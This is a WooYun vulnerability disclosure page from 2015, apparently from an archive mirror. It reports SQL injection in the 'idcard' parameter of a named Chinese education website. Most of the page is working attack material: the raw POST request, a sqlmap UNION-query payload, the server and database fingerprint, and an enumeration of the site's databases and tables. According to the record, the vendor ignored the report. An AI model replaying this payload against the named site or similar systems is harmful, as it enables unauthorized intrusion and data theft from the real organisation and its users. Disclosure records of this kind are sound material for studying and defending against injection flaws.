乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-25: 细节已通知厂商并且等待厂商处理中 2015-12-30: 厂商已经主动忽略漏洞,细节向公众公开
RT
http://jkb.shtvu.edu.cn/main/default.asp
POST /chaxun/all_pass.asp HTTP/1.1Content-Length: 53Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://jkb.shtvu.edu.cnCookie: ASPSESSIONIDQQBDATTT=PLJPKNHBNGJLOBJCLOJEKBLBHost: jkb.shtvu.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*idcard=SwOltvJA
idcard参数存在注入
sqlmap resumed the following injection point(s) from stored session:---Parameter: idcard (POST) Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: idcard=SwOltvJA' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(114)+CHAR(79)+CHAR(101)+CHAR(110)+CHAR(65)+CHAR(78)+CHAR(122)+CHAR(99)+CHAR(75)+CHAR(103)+CHAR(70)+CHAR(87)+CHAR(106)+CHAR(120)+CHAR(101)+CHAR(111)+CHAR(97)+CHAR(69)+CHAR(79)+CHAR(113)+CHAR(89)+CHAR(65)+CHAR(101)+CHAR(103)+CHAR(84)+CHAR(115)+CHAR(106)+CHAR(114)+CHAR(104)+CHAR(72)+CHAR(88)+CHAR(106)+CHAR(105)+CHAR(116)+CHAR(69)+CHAR(68)+CHAR(105)+CHAR(72)+CHAR(79)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(107)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL-- ----web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000current user: 'jkb'current database: 'jkb_web'current user is DBA: Falseavailable databases [8]:[*] jkb_bbs[*] jkb_web[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] tempdb
Database: jkb_bbs+------------------------------+---------+| Table | Entries |+------------------------------+---------+| dbo.ol_yan_bbs_classdistinct | 699 || dbo.ol_yan_bbs_classdistinct | 699 || dbo.ol_wu_bbs_experienceLog | 277 || dbo.ol_yan_bbs_guest | 251 || dbo.ol_yan_bbs_answer | 141 || dbo.sysconstraints | 71 || dbo.ol_yan_bbs_question | 69 || dbo.ol_yan_bbs_distrinct | 20 || dbo.ol_yan_bbs_schooltype | 10 || dbo.ol_yan_bbs_friend | 5 || dbo.syssegments | 3 || dbo.ol_yan_bbs_message | 2 || dbo.ol_yan_bbs_admin | 1 || dbo.ol_yan_bbs_badword | 1 || dbo.ol_zheng_bbs_online | 1 |+------------------------------+---------+
危害等级:无影响厂商忽略
忽略时间:2015-12-30 16:10
漏洞Rank:4 (WooYun评价)
暂无